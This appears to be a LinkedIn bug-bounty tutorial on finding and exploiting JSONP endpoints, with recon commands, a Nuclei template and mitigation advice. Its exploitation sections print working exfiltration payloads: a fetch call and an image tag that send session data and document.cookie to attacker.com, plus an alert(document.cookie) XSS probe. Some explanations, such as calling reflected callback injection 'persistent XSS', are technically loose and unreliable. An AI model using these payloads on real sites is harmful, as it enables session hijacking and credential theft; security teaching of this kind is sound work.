Exploiting JSON-P Based API Endpoints for Data Exfiltration
Why JSONP Still Matters in Bug Bounties
JSON with Padding (JSONP) was originally introduced as a workaround for same-origin policy (SOP) restrictions, allowing websites to load JSON data from third-party domains using <script> tags. However, many legacy and modern applications still have JSONP endpoints enabled, creating a significant cross-origin data exfiltration risk. When misconfigured, JSONP endpoints can be abused to steal user-sensitive data, perform unauthorized actions, and even execute persistent XSS attacks.
Why Should Bug Hunters Care About JSONP?
In this guide, we will cover:
✅ How to find and identify JSONP endpoints.
✅ Exploitation techniques for data exfiltration and credential theft.
✅ Turning JSONP misconfigurations into XSS and full account takeover attacks.
✅ Automating JSONP exploitation in bug bounty workflows.
1. Identifying JSONP Endpoints: Where to Look
JSONP endpoints are commonly found in applications that support cross-origin API requests. They usually return JSON data wrapped inside a user-supplied callback function. Look for the following characteristics:
Common JSONP Endpoint Patterns:
Finding JSONP Endpoints with Reconnaissance Tools
1️⃣ Using Burp Suite & Passive Analysis
2️⃣ Using JavaScript Scraping & Automated Recon
subjs -u https://example.com | grep -i jsonp
python3 linkfinder.py -i https://example.com/script.js -o cli
echo "example.com" | gau | grep 'callback='
Once you have identified potential JSONP endpoints, move on to exploitation.
2. Exploiting JSONP for Data Exfiltration
If a JSONP endpoint is misconfigured and allows arbitrary callback function names, an attacker can use it to steal sensitive data by crafting malicious script injections.
1️⃣ Crafting an Attack Payload for Data Theft
If a JSONP endpoint responds like this:
processData({"user":"admin", "email":"admin@example.com", "session":"abc123xyz"});
You can modify the callback parameter to redirect the response to an attacker-controlled site:
<script src="https://api.example.com/getUserData?callback=evilFunction"></script>
This results in:
evilFunction({"user":"admin", "email":"admin@example.com", "session":"abc123xyz"});
If evilFunction is hosted on an attacker’s site, the victim’s data is exfiltrated via cross-origin execution.
2️⃣ Automating JSONP Exploitation for Credential Theft
To capture user credentials and sessions, inject the following payload into a webpage the victim will visit:
<script>
function exfiltrateData(data) {
fetch("https://attacker.com/log?data=" + encodeURIComponent(JSON.stringify(data)));
}
</script>
<script src="https://api.example.com/getUserData?callback=exfiltrateData"></script>
This will steal and send the victim’s session tokens and private data to an attacker's server.
Recommended by LinkedIn
3. Turning JSONP Exploitation into Persistent XSS
If a JSONP endpoint does not validate callback function names properly, an attacker can use it for persistent XSS.
1️⃣ Identifying XSS-Prone JSONP Endpoints
Try injecting JavaScript code into the callback parameter:
https://example.com/api/search?callback=alert(document.cookie)
If the response looks like this:
alert(document.cookie)({"results": "sensitive data"});
Then XSS is possible.
2️⃣ Crafting a Persistent XSS Attack
A more effective approach is to inject an external JavaScript file as the callback function:
<script src="https://example.com/api/search?callback=evilScript"></script>
Then, host evilScript.js on an attacker-controlled domain:
function evilScript(data) {
document.write('<img src="https://attacker.com/steal?cookie=' + document.cookie + '" />');
}
When the victim visits the vulnerable page, their session cookies and authentication tokens are exfiltrated.
4. Automating JSONP Hunting in Bug Bounty Workflows
Since JSONP is a legacy technology, some applications still rely on it for cross-domain requests. Automating its discovery can be highly valuable.
1️⃣ Using FFUF to Fuzz for JSONP Parameters
ffuf -u https://example.com/FUZZ -w wordlists/jsonp_params.txt -mc 200
2️⃣ Running Nuclei for JSONP Scanning
Create a custom Nuclei template to detect JSONP vulnerabilities:
authors:
- bug_hunter
info:
name: JSONP Misconfiguration Detection
severity: high
tags: jsonp,exfiltration
requests:
- method: GET
path:
- "{{BaseURL}}/api?callback=evilFunction"
matchers:
- type: word
part: body
words:
- "evilFunction({"
Then run:
nuclei -t jsonp-template.yaml -u https://example.com
5. Writing High-Impact Bug Bounty Reports
When reporting JSONP vulnerabilities, include:
🔹 Proof of Concept (PoC) Payloads demonstrating data exfiltration.
🔹 Impact Analysis explaining how sensitive user data and authentication tokens are exposed.
🔹 Suggested Mitigations:
✅ Disable JSONP unless absolutely necessary.
✅ Implement strict callback allowlists.
✅ Use CORS with strict security policies instead of JSONP.
Why JSONP Is Still Relevant in Bug Bounty Hunting
Even though JSONP is considered a legacy technology, many applications still use it, making it an overlooked but powerful target. By adding JSONP exploitation to your bug bounty workflow, you can uncover critical vulnerabilities leading to credential theft, session hijacking, and persistent XSS.
Next Steps:
✅ Start testing for JSONP misconfigurations on real-world bug bounty programs.
✅ Automate JSONP discovery using Nuclei, FFUF, and JavaScript scrapers.
✅ Submit high-impact reports to maximize payouts.
Happy hunting!
🔥